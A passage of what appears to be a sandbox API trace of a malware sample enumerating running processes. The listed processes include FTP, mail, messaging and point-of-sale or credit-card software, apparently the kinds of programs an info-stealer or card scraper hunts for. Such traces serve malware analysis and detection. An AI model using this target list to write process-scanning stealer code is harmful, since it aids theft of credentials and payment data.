th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0271.290] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0271.332] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0271.334] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0271.336] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0271.347] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0271.349] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0271.351] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0271.353] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0271.359] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0271.361] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0271.363] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0271.365] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0271.367] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0271.369] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0271.375] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0271.377] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0271.379] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0271.381] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0271.383] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0271.406] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0271.408] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0271.410] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0271.412] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0271.414] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0271.421] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0271.423] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0271.425] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0271.427] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0271.429] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0271.432] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0271.438] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0271.440] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0271.442] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0271.445] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0271.447] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0271.500] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0271.502] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0271.505] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0271.507] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0271.509] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0271.515] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0271.517] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0271.520] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0271.522] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0271.524] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0271.527] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0271.533] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0271.535] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0271.538] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0271.540] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0271.592] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0271.595] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0271.597] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0271.599] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0271.602] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0271.604] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0271.610] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0271.612] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0271.614] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0271.616] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0271.617] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0271.619] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0271.623] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0271.625] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0271.627] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0271.629] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0271.631] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0271.633] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0271.644] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0271.646] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0271.648] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0271.650] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0271.655] CloseHandle (hObject=0x1d14) returned 1 [0271.655] Sleep (dwMilliseconds=0x64) [0271.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0271.804] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.805] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0271.807] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0271.808] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0271.812] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0271.814] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0271.815] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0271.817] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0271.818] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0271.819] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.821] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, 